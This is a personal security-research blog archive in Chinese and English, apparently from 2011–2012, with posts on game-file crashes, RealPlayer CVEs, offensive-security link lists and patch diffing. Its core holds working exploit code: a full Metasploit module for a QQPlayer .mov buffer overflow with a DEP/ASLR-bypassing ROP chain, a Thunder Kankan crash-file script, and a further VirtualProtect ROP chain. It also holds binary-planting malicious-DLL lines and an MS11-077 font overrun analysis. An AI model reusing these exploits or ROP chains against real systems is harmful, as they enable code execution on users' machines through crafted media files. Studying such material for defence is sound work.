CQ-CSER

2012

cq — Sun, 15 Jan 2012 08:17:54 +0000

新年快到了，昨天到家了，整理下最近买的，强的，别人送的

各种怀念啊！

新年要有新计划，还是写下来约束力大点。

1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果

2.完善理论，开发自用工具，向大虾学习。

3.忘记一些东东，稳定下来，培养新习惯。

4.实践新技术方向

No related posts.

WAR3格式

cq — Mon, 12 Dec 2011 09:13:46 +0000

本来是考虑w3g格式的
参见如下

http://w3g.deepnode.de/files/w3g_format.txt

大致包含部分：
版本头
压缩数据

解压出来包含各类时间，动作等。用的是ZLIB解压
/////////////////////////////////////////////////////////////////////////////////////////////////////
后来想了下，用录像不如用地图，随便打开一个

00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W….鍙槸鍙

00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?

00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?

00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?……….

00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; …………….

00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. ….4Vx….

00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@…….

00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $…?..?..?..

00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %…T…?..?..

猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？

WAR3应该是VC6的老编译器的吧。作为一个忠实真三DOTA爱好者，唉

////////////////////////////////////////////////////////////

再来看最近的几个scada的，不管是溢出还是use-after-free，某人的入手点很好啊，从注册类型PROJECT文件处理入手。

////////////////////////////////////////////////////////////

另，REALPLAYER一次补了好多洞啊

REALPLAYER QCP,AAC,MP3,SWF，RealAudio sipr 漏洞

CVE-2011-2945

RealPlayer SIPR Heap Buffer Overflow Vulnerability （out of bound）http://wiki.multimedia.cx/index.php?title=RealAudio_sipr

CVE-2011-2946

RealPlayer ActiveX Remote Code Execution Vulnerability

CVE-2011-2947

RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability

CVE-2011-2952

RealPlayer Dialog Box Use After Free Vulnerability

CVE-2011-2953

RealPlayer ActiveX Browser Plugin Out of Bounds Vulnerability.

CVE-2011-2954

RealPlayer Embedded AutoUpdate Use After Free Vulnerability

CVE-2011-2955

RealPlayer Embedded Modal Dialog Use After Free Vulnerability

CVE-2011-1221

RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability

No related posts.

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

cq — Mon, 21 Nov 2011 08:26:22 +0000

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb
样本：

http://115.com/file/cl3naedv

http://115.com/file/aqu3qzmk

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok(warptencq[at]gmail.com) # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT


	def initialize(info = {})

		super(update_info(info,

			'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',

			'Description'    => %q{

					This module exploits a vulnerability in QQPLAYER Player 3.2.

				When opening a .mov file containing a specially crafted PnSize value, an attacker

				may be able to execute arbitrary code.

			},

			'License'        => MSF_LICENSE,

			'Author'         =>

				[

					'hellok',  #special thank corelanc0d3r for 'mona'

				],

			'References'     =>

				[

				],

			'DefaultOptions' =>

				{

					'EXITFUNC' => 'process',

					'DisablePayloadHandler' => 'true',

				},

			'Payload'        =>

				{

					'Space'          => 750,

					'BadChars'       => "",  #Memcpy

					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,

					'DisableNops'    =>  'True',

					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

					'EncoderOptions' =>

						{

							'BufferRegister' => 'ECX',

						},

				},

			'Platform' => 'win',

			'Targets'        =>

				[

					[ 'Windows 7', { 'Ret' => 0x67664cde } ],

				],

			'Privileged'     => false,

			'DisclosureDate' => '11 21 2011',

			'DefaultTarget'  => 0))
		register_options(

			[

				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),

			], self.class)

	end

	def exploit

		# !mona rop

		rop_gadgets =

		[
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x12345678,

			0x67664CE4,

			0x01020304,

			0x10203040,

			0x22331122,

			0x23456789,
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x00a9c18c,	# <- *&VirtualProtect()

			0x0054f100,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)

			#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)

			0x008cf099,	# XCHG EAX,ESI # RETN
			0x6497aaad,	# POP EBP # RETN (avformat-52.dll)

			0x100272bf,	# ptr to 'call esp' (from i18nu.dll)

			0x005fc00b,	# POP EBX # RETN (QQPlayer.exe)

			0x00000331,	# <- change size to mark as executable if needed (-> ebx)

			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x63d18000,	# RW pointer (lpOldProtect) (-> ecx)

			0x63d05001,	# POP EDI # RETN (avutil-49.dll)

			0x63d05002,	# ROP NOP (-> edi)

			0x008bf00b,	# POP EDX # RETN (QQPlayer.exe)

			0x00000040,	# newProtect (0x40) (-> edx)

			0x00468800,	# POP EAX # RETN (QQPlayer.exe)

			0x90909090,	# NOPS (-> eax)

			0x008bad5c,	# PUSHAD # RETN (QQPlayer.exe)

		# rop chain generated by mona.py

		# note : this chain may not work out of the box

		# you may have to change order or fix some gadgets,

		# but it should give you a head start

		].pack("V*")
		stackpivot = [target.ret].pack('L')
		buffer =rand_text_alpha_upper(90)#2

		buffer << rop_gadgets

		buffer << payload.encoded
		junk = rand_text_alpha_upper(2306 - buffer.length)
		buffer << junk

		buffer << stackpivot

		buffer << rand_text_alpha_upper(3000)#3000
		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )

		fd = File.open(path, "rb" )

		sploit = fd.read(fd.stat.size)

		fd.close
		sploit << buffer

file_create(sploit) end end

thunder_kankan_stack_overflow/dos exploit

cq — Thu, 17 Nov 2011 14:56:32 +0000

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py

print “”"

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

#0 ___ ___ ___ ___ ___ ___ 1

#1 /\__\ /\ \ /\__\ /\__\ /\ \ /\__\ 0

#0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1

#1 /:/__/ /:/\:\ \ /:/ / /:/ / /:/\:\ \ /:/__/ 0

#0 /::\ \ ___ /::\~\:\ \ /:/ / /:/ / /:/ \:\ \ /::\__\____ 1

#1 /:/\:\ /\__\ /:/\:\ \:\__\ /:/__/ /:/__/ /:/__/ \:\__\ /:/\:::::\__\0

#0 \/__\:\/:/ / \:\~\:\ \/__/ \:\ \ \:\ \ \:\ \ /:/ / \/_|:|~~|~ 1

#1 \::/ / \:\ \:\__\ \:\ \ \:\ \ \:\ /:/ / |:| | 0

#0 /:/ / \:\ \/__/ \:\ \ \:\ \ \:\/:/ / |:| | 1

#1 /:/ / \:\__\ \:\__\ \:\__\ \::/ / |:| | 0

#0 \/__/ \/__/ \/__/ \/__/ \/__/ \|__| 1

#1 0

#0 [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit 1

#1 [+] Software Link: dl.xunlei.com/xmp.html 0

#0 [+] Software: Thunder kankan player 1

#1 [+] Version : 4.8.3.840(last) 0

#0 [+] Tested On: WIN 7 1

#1 [+] Code by: hellok(warptencq@gmail.com) 0

#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1

“”"

filepath = “exploit.wav”

f = open(filepath, “wb”)

file = ‘\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20′

f.write(file)

f.close()

print “Done..”

主要2出错误，都是没校验直接从文件中读出。
bass_wv.dll中的
seg002:10005C2D ; —————————————————————————
seg002:10005C2D ; 148: clean_junk_part:
seg002:10005C2D ; 149: v17 = malloc(site_malloc_may_error);
seg002:10005C2D
seg002:10005C2D clean_junk_part: ; CODE XREF: seem_important+1BDj
seg002:10005C2D ; seem_important+245j
seg002:10005C2D push esi ; Size
seg002:10005C2E call malloc ; /size = F2471B06 (-230221050.)可控
seg002:10005C34 ; 150: (**(memory1 + 112))(*(memory1 + 116), v17, site_malloc_may_error);// basedll(+116)
seg002:10005C34 mov ecx, [ebp+74h] ; 申请失败，导致EAX==00
seg002:10005C37 add esp, 4
seg002:10005C3A mov edi, eax ; eax==0000 污染源
seg002:10005C3C mov eax, [ebp+70h]
seg002:10005C3F push esi
seg002:10005C40 mov edx, edi
seg002:10005C42 call dword ptr [eax] ; call base.dll!!!!!!!!!!!!!!!!
seg002:10005C42 ; 从文件里读ECX大小内容到刚开辟空间
seg002:10005C44 ; 151: free(v17);
seg002:10005C44 push edi ; Memory
seg002:10005C45 call free
seg002:10005C4B ; 152: strncpy_ = strncmp;
seg002:10005C4B mov edi, strncmp
seg002:10005C51 add esp, 4
seg002:10005C54 jmp loc_10005AF7

另一来自base.dll
seg000:1001083D pop eax
seg000:1001083E ; 100: if ( v66 > 0×12 ) v66可控污染源
seg000:1001083E cmp [ebp+var_10], eax
seg000:10010841 jbe short crash_inside
seg000:10010843 ; 101: v14 = v66;
seg000:10010843 mov eax, [ebp+var_10]
seg000:10010846 ; 102: v15 = v14 + 3;
seg000:10010846
seg000:10010846 crash_inside: ; CODE XREF: crash_here__+242j
seg000:10010846 add eax, 3
seg000:10010849 ; 103: LOBYTE(v15) = v15 & 0xFC;
seg000:10010849 and al, 0FCh
seg000:1001084B ; 104: v16 = alloca(v15);
seg000:1001084B call __alloca_probe
seg000:10010850 ; 105: v4 = &v39;
seg000:10010850 mov ebx, esp
seg000:10010852 ; 106: sub_10001974(v5, &v39, v66);

bass_wv.dll的里面看了半天,想搞个什么use after free,double free什么的,可惜没找到啊,小遗憾啦

Blogs, Feeds, Guides & Links[zz]

cq — Sun, 13 Nov 2011 10:33:15 +0000

原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html
顺便FK GFW
特别推荐http://j00ru.vexillium.org/?p=893此系列

Programming/Coding
[Bash] Advanced Bash-Scripting Guide – http://tldp.org/LDP/abs/html/
[Bash] Bash shell scripting tutorial – http://steve-parker.org/sh/sh.shtml
[Bash] Bourne Shell Reference – http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby – http://hyperpolyglot.org/scripting

Offensive Security’s Pentesting With BackTrack (PWB) Course
[Pre-course] Corelan Team – http://www.corelan.be
[Pre-course] The Penetration Testing Execution Standard – http://www.pentest-standard.org/index.php/Main_Page
[Hash] NTLM Decrypter – http://www.md5decrypter.co.uk/ntlm-decrypt.aspx
[Hash] reverse hash search and calculator – http://goog.li

http://security.crudtastic.com/?p=213

Tunnelling / Pivoting
[Linux] SSH gymnastics with proxychains – http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
[Windows] Nessus Through SOCKS Through Meterpreter – http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

WarGames / Online Challenges
[WarGames] Title – http://securityoverride.com
[WarGames] Title – http://intruded.net
[Challenge] The Ksplice Pointer Challenge – http://blogs.oracle.com/ksplice/
[WarGames] Title – http://spotthevuln.com
[WarGames] Title – http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html
[WarGames] Title – http://ftp.hackerdom.ru/ctf-images/

Exploit Development (Programs)
[Download] Title – http://www.oldapps.com/
[Download] Title – http://www.oldversion.com/
[Download] Title – http://www.exploit-db.com/webapps/

Misc
[RSS] Open Penetration Testing Bookmarks Collection – https://code.google.com/p/pentest-bookmarks/downloads/list
[ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses – http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html
[DIY] Repair a Broken Ethernet Plug – http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/
[Desktop] Ubuntu Security – http://ubuntuforums.org/showthread.php?t=510812
[TechHumor] Title – https://www.xkcd.com
[TechHumor] Title – http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf

Exploit Development
[Guides] Corelan Team – http://www.corelan.be
[Guide] From 0×90 to 0x4c454554, a journey into exploitation. – http://myne-us.blogspot.com/2010/08/from-0×90-to-0x4c454554-journey-into.html
[Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities – http://resources.infosecinstitute.com/intro-to-fuzzing/
[Video] TiGa’s Video Tutorial Series on IDA Pro – http://www.woodmann.com/TiGa/idaseries.html
[Guide] Advanced Windows Buffer Overflows – http://labs.snort.org/awbo/
[Guide] Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt
[Guide] SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
[Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
[Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
[Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
[Linux] Linux exploit development part 1 – Stack overflow. – http://sickness.tor.hu/?p=363
[Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg – http://sickness.tor.hu/?p=365
[Linux] Linux exploit development part 3 – ret2libc – http://sickness.tor.hu/?p=368
[Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt – http://sickness.tor.hu/?p=378
[TechHumor] Title – https://www.youtube.com/watch?v=klXFqtYR5Mg
[TechHumor] Title – http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html

Exploit Development (Case Studies/Walkthroughs)
[Web] Finding 0days in Web Applications – http://www.exploit-db.com/finding-0days-in-web-applications/
[Windows] Offensive Security Exploit Weekend – http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/
[Windows] From vulnerability to exploit under 5 min – http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html

Exploit Development (Patch Analysis)
[Windows] A deeper look at ms11-058 – http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058
[Windows] Patch Analysis for MS11-058 – https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058
[Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability – http://j00ru.vexillium.org/?p=893
[Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities – https://www.net-security.org/article.php?id=1613

Exploit Development (Metasploit Wishlist)
[ExplotDev] Metasploit Exploits Wishlist ! – http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html
[Guide] Porting Exploits To Metasploit Part 1 – http://www.securitytube.net/video/2118

Passwords & Rainbow Tables (WPA)
[RSS] Title – http://ob-security.info/?p=475
[RSS] Title – http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/
[RSS] Title – http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
[WPA] Offensive Security: WPA Rainbow Tables – http://www.offensive-security.com/wpa-tables/
[Tool] Ultra High Security Password Generator – https://www.grc.com/passwords.htm
[Guide] Creating effective dictionaries for password attacks – http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html
[Leaked] Diccionarios con Passwords de Sitios Expuestos – http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml
[Download] Index of / – http://svn.isdpodcast.com/wordlists/
[Guide] Using Wikipedia as brute forcing dictionary – http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary
[Tool] CeWL – Custom Word List generator – http://www.digininja.org/projects/cewl.php
[Download] Title – http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
[Leaked] Passwords – http://www.skullsecurity.org/wiki/index.php/Passwords

Cheat-Sheets
[OS] A Sysadmin’s Unixersal Translator – http://bhami.com/rosetta.html
[WiFi] WirelessDefence.org’s Wireless Penetration Testing Framework – http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html

Anti-Virus
[Metasploit] Facts and myths about antivirus evasion with Metasploit – http://schierlm.users.sourceforge.net/avevasion.html
[Terms] Methods of bypassing Anti-Virus (AV) Detection – NetCat – http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html

Privilege Escalation
[Linux] Hacking Linux Part I: Privilege Escalation – http://www.dankalia.com/tutor/01005/0100501004.htm
[Windows] Windows 7 UAC whitelist – http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
[Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges – http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/

Metasploit
[Guide] fxsst.dll persistence: the evil fax machine – http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html
[Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec – http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/
[Guides] Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
[Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 – http://www.securitytube.net/video/1175

Default Generators
[WEP] mac2wepkey – Huawei default WEP generator – http://websec.ca/blog/view/mac2wepkey_huawei
[WEP] Generator: Attacking SKY default router password – http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password

Statistics
[Defacements] Zone-H – http://www.zone-h.org
[ExploitKits] CVE Exploit Kit list – http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm

Cross Site Scripting (XSS)
[Guide] vbSEO – From XSS to Reverse PHP Shell – http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
[RSS] Title – http://www.thespanner.co.uk/2009/03/25/xss-rays/

Podcasts
[Weekly] PaulDotCom – http://pauldotcom.com/podcast/psw.xml
[Monthly] Social-Engineer – http://socialengineer.podbean.com/feed/

Blogs & RSS
[RSS] SecManiac – http://www.secmaniac.com
[Guides] Carnal0wnage & Attack Research – http://carnal0wnage.attackresearch.com
[RSS] Contagio – http://contagiodump.blogspot.com
[News] THN : The Hacker News – http://thehackernews.com
[News] Packet Storm: Full Disclosure Information Security – http://packetstormsecurity.org
[Guides] pentestmonkey | Taking the monkey work out of pentesting – http://pentestmonkey.net
[RSS] Darknet – The Darkside | Ethical Hacking, Penetration Testing & Computer Security – http://www.darknet.org.uk
[RSS] Irongeek – http://www.irongeek.com
[Metasploit] Room 363 – http://www.room362.com
[Guides] Question Defense: Technology Answers For Technology Questions – http://www.question-defense.com/
[Guides] stratmofo’s blog – http://securityjuggernaut.blogspot.com
[Guides] TheInterW3bs – http://theinterw3bs.com

[Guides] consolecowboys – http://console-cowboys.blogspot.com
[Guides] A day with Tape – http://adaywithtape.blogspot.com
[Guides] Cybexin’s Blog – Network Security Blog – http://cybexin.blogspot.com

[RSS] BackTrack Linux – Penetration Testing Distribution – http://www.backtrack-linux.org/feed/
[RSS] Offensive Security – http://www.offensive-security.com/blog/feed/

[RSS] Title – http://www.pentestit.com
[RSS] Title – http://michael-coates.blogspot.com
[RSS] Title – http://blog.0x0e.org
[RSS] Title – http://0×80.org/blog
[RSS] Title – http://archangelamael.shell.tor.hu
[RSS] Title – http://archangelamael.blogspot.com
[RSS] Title – http://www.coresec.org
[RSS] Title – http://noobys-journey.blogspot.com
[RSS] Title – http://www.get-root.com
[RSS] Title – http://www.kislaybhardwaj.com
[RSS] Title – https://community.rapid7.com/community/metasploit/blog
[RSS] Title – http://mimetus.blogspot.com
[RSS] Title – http://hashcrack.blogspot.com
[RSS] Title – https://rephraseit.wordpress.com
[RSS] Title – http://www.exploit-db.com
[RSS] Title – http:/skidspot.blogspot.com
[RSS] Title – http://grey-corner.blogspot.com
[RSS] Title – http://vishnuvalentino.com
[RSS] Title – http://ob-security.info

…. Not enough? Try twitter and/or IRC!

记事

cq — Wed, 02 Nov 2011 06:23:21 +0000

http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log
// We crash inside this function
// In swscale.c: Function ‘simpleCopy’
// Line: 1961 – Buffer Overrun
// This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B)
搞了好久才无意发现是这个。暂时不好利用。待定了。
枉费我在没SYMBOLS的情况下搞了好久，心碎啊，教训教训。。

While this DLL seems interesting, it does not import VirtualAlloc, VirtualProtect, HeapCreate, WriteMemory or even a LoadLibrary, which complicates exploitation. However, the attacker did find and use other functions:

4A84903C CreateFileA // create the file iso88591
4A849038 CreateFileMappingA // attrib RWE
4A849030 MapViewOfFile // load this file in memory with RWE flags
4A849170 memcpy // copy the payload

The idea of the attacker was to spray the heap with a ROP pattern, followed by the shellcode. It first creates a file (iso88591) on disk, loads it with RWE attributes, copies the payload in memory and eventually executes the shellcode.

新思路，BYPASS DEP ASLR .

rop = [
rop_base + 0x1022, # retn

# Write lpfOldProtect
rop_base + 0x2c283, # pop eax; retn
heap - 0x1000, # lpfOldProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn

# Write flNewProtect
rop_base + 0x2c283, # pop eax; retn
0×40, # flNewProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn

# Write dwSize
rop_base + 0x2c283, # pop eax; retn
0×60000, # dwSize -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn

# Write lpAddress
rop_base + 0x2c283, # pop eax; retn
heap & ~0xfff, # lpAddress -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn

# Write &Pivot
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x229a5, # &pivot -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn

# Write &VirtualProtect
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]
rop_base + 0x1db4f, # mov [esi],eax; retn

# Pivot ESP
rop_base + 0x229a5, # xchg esi,esp; retn;

# Jump into shellcode
rop_base + 0xdace8 # push esp; retn
]
WIN8上的ROP，有点小变化啦。

https://code.google.com/p/address-sanitizer/

貌似最近CHROME用这东东发现不少use-after-free and out-of-bound bugs
标记+1啦～

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

recent life

cq — Tue, 25 Oct 2011 08:55:36 +0000

chrome 待定

http://code.google.com/p/selenium/wiki/JsonWireProtocol

http://www.chromium.org/developers/testing/webdriver-for-chrome/chromedriver-internals

http://selenium.googlecode.com/svn/trunk/docs/api/java/org/openqa/selenium/chrome/ChromeDriver.html

http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/REVISIONS

http://src.chromium.org/svn/trunk/

http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/chrome-win32.test/ .

binary_planting 系列,GOOD!

http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html

http://www.binaryplanting.com/guidelinesDevelopers.htm

http://www.binaryplanting.com/test.htm

this problem also affects the way Windows processes are launched via various functions
such as CreateProcess*, ShellExecute*, WinExec, LoadModule, _spawn*p* and _exec*p*.
library=c:\temp\malicious.dll
library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib

derbycon2011

http://www.irongeek.com/i.php?page=videos/derbycon1/tony-huffman-myne-us-when-fuzzers-miss-the-no-hanging-fruit

bot funny!

http://www.m86security.com/labs/bot_statistics.asp

autocomplete stolen

http://blog.mindedsecurity.com/2011/10/autocompleteagain.html

WEB指纹识别

http://sebug.net/chweb/

peachfuzz

http://peachfuzzer.com/TutorialNetworkServer

另

https://media.blackhat.com/bh-us-11/Cerrudo/BH_US_11_Cerrudo_Vulnerability_Hunting_Windows_Slides.pdf

此文系慢慢看

No related posts.

darungrim

cq — Sat, 15 Oct 2011 03:51:52 +0000

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.
Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it’s fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It’s also used to write 1-day exploits by malware writers or security researchers.

http://www.darungrim.org/

另转贴几篇文，墙什么的真DT。
原文在这里：http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/
MS11-077: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)
Posted: 2011/10/12 | Author: lifeasageek | Filed under: Uncategorized |Leave a comment »
Download MS11-077 .fon buffer overrun exploit : my.fon.tar.gz
Download very simple *.fon* fuzzer like tool : ms11-077-fon-exploit.tar.gz

Related CVEs
Font Library File Buffer Overrun Vulnerability – CVE-2011-2003

Diffing Binary Information
win32k.sys win32k.dll: 6.1.7601.21744 (win7sp1_ldr.110610-1504) VS 6.1.7601.21811 (win7sp1_ldr.110905-1505) (on Windows 7, 32bit)

Descriptions
This posting is no technical analysis, but it is driven by hardcore & intuition based analysis to make 1-day exploit.

MS11-077 was confusing at the first time. Because it involves 4 different vulnerabilities, we should try to match up these vulnerabilities whenever we reverse engineer the function. This time I will not show the DarunGrim diffing results cause it showed around 50 different functions! Don’t get frustrated though. It’s not going to take that long time to take a look all of them. Within 10 secs for each of the function, you might be able to decide whether the function is interesting or not.

Before getting to the details, you may also look into these. Three functions seem to be related to the null dereference bugs (_NtUserfnINLBOXSTRING(), _NtUserfnSENTDDEMSG(), _InterQueueMsgCleanup()). The function, _ConvertToAndFromWideChar(), seem to be related to “Win32k Use After Free Vulnerability – CVE-2011-2011″. You must be able to understand what I am meaning by here as soon as you open up these functions with DarunGrim.

What I want to focus in this post is .FON buffer overrun bug (CVE-2011-2003). From DarunGrim diffing result, _BmfdOpenFontContext() showed the different point below.

What ??? Patched version only adds immediate value ’5′ to some value (add eax, 5), and that computed value is related to decide the size of allocation. Seems interesting but strange. It is time to see the details to understand the contexts. Here goes the disassembly around the changed BB of the old win32k.sys.

.text:90857F82 loc_90857F82: ; CODE XREF: BmfdOpenFontContext(x)+E2j
.text:90857F82 mov eax, [ebp+numElement]
.text:90857F85 add eax, 7
.text:90857F88 shr eax, 3
.text:90857F8B mov [ebp+var_4], ecx
.text:90857F8E cmp eax, 100h
.text:90857F93 jbe short loc_90857FA1
.text:90857F95 add eax, 28h
.text:90857F98 mov [ebp+var_4], 3
.text:90857F9F jmp short loc_90857FA4
.text:90857FA1
.text:90857FA1 loc_90857FA1: ; CODE XREF: BmfdOpenFontContext(x)+E7j
.text:90857FA1 ; BmfdOpenFontContext(x)+FAj
.text:90857FA1 mov eax, [ebp+preDefinedSize]
.text:90857FA4
.text:90857FA4 loc_90857FA4: ; CODE XREF: BmfdOpenFontContext(x)+106j
.text:90857FA4 push 64666D42h ; Tag
.text:90857FA9 push eax ; int
.text:90857FAA push 0 ; char
.text:90857FAC call _EngAllocMem@12 ; EngAllocMem(x,x,x)

This is the pseudo-code of these assembly. The variable naming was done at my convenience.

uint preDefinedSize = 0×28; // mov dword ptr [ebp-14h], 28h
sizeToAllocate = (numElement + 7) / 8;

if( sizeToAllocate <= 0×100)
sizeToAllocate = preDefinedSize;
else
sizeToAllocate += 0×28;

EngAllocMem(0, sizeToAllocate, 0x64666d42);

